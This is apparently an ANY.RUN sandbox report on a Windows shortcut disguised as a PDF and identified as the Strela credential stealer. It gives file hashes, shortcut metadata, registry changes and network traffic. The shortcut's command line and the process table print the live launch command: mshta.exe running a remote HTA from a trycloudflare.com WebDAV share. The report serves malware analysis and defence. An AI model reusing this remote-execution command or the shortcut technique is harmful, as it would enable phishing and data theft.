download:

/1FSVABRA/RE_007394029384393483.pdf.lnk

Full analysis: https://app.any.run/tasks/ef5a06be-f59b-487f-8614-f3d5f08724a9
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: April 15, 2025, 19:32:05
OS: Windows 11 Professional (build: 22000, 64 bit)
Tags:
auto
stealer
strela
webdav
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe", EnableTargetMetadata, Archive, ctime=Sat Sep 15 07:12:47 2018, atime=Sat Sep 15 07:12:47 2018, mtime=Sat Sep 15 07:12:47 2018, length=14848, window=showminnoactive, IDListSize 0x013b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\mshta.exe"
MD5:

60D2C56F6442DA684CA824C51A93EDDE

SHA1:

D1FB256E92F812773B6A018637DF56E3C63891EE

SHA256:

91CDF10ED292A169E32C5DF33913845EDA527E9940133E894A2E0840C2499A07

SSDEEP:

48:8FnJTe+TS2uMeTVdaXuHHnRHtL2JqsrSQpLWVj:8FnJdG8ewunhtLCqsrpSVj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • STRELA has been found (auto)

      • mshta.exe (PID: 1640)

  • SUSPICIOUS

    • Remote file execution via WebDAV

      • mshta.exe (PID: 1640)

    • Reads the Internet Settings

      • mshta.exe (PID: 1640)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 1640)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon, TargetMetadata
FileAttributes: Archive
CreateDate: 2018:09:15 07:12:47+00:00
AccessDate: 2018:09:15 07:12:47+00:00
ModifyDate: 2018:09:15 07:12:47+00:00
TargetFileSize: 14848
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: mshta.exe
DriveType: Fixed Disk
DriveSerialNumber: 9A3D-9F93
VolumeLabel: -
LocalBasePath: C:\Windows\System32\mshta.exe
RelativePath: ..\..\..\..\Windows\System32\mshta.exe
CommandLineArguments: "\\optical-bright-fonts-zealand.trycloudflare.com@SSL\DavWWWRoot\raye.hta"
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
MachineID: alexhost-my-uk0
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
101
Monitored processes
1
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start mshta.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1640"C:\Windows\System32\mshta.exe" "\\optical-bright-fonts-zealand.trycloudflare.com@SSL\DavWWWRoot\raye.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wldp.dll
c:\windows\system32\mshtml.dll
Total events
247
Read events
239
Write events
8
Delete events
0

Modification events

(PID) Process:(1640) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1640) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1640) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1640) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
12
DNS requests
8
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3828
smartscreen.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
3640
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1352
svchost.exe
GET
200
184.24.77.24:80
http://www.msftconnecttest.com/connecttest.txt
unknown
whitelisted
3828
smartscreen.exe
GET
200
208.89.74.31:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?97e4ac889e4385d3
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1352
svchost.exe
184.24.77.4:80
Akamai International B.V.
DE
unknown
3828
smartscreen.exe
108.141.37.120:443
checkappexec.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3828
smartscreen.exe
208.89.74.31:80
ctldl.windowsupdate.com
US
whitelisted
3952
svchost.exe
239.255.255.250:1900
whitelisted
3828
smartscreen.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4820
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3640
svchost.exe
20.190.159.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3640
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
3884
svchost.exe
23.197.142.186:443
fs.microsoft.com
Akamai International B.V.
US
whitelisted
4820
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.23.110
whitelisted
checkappexec.microsoft.com
  • 108.141.37.120
whitelisted
ctldl.windowsupdate.com
  • 208.89.74.31
  • 208.89.74.27
  • 208.89.74.23
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
whitelisted
login.live.com
  • 20.190.159.128
  • 40.126.31.67
  • 40.126.31.128
  • 40.126.31.2
  • 40.126.31.73
  • 20.190.159.2
  • 20.190.159.23
  • 20.190.159.4
whitelisted
fs.microsoft.com
  • 23.197.142.186
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO Microsoft Connection Test
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
/1FSVABRA/RE_007394029384393483.pdf.lnk